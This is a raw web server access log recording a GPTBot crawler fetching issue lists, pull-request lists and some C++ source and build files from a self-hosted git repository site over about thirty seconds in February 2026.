"/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13824] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11264] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33912] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" 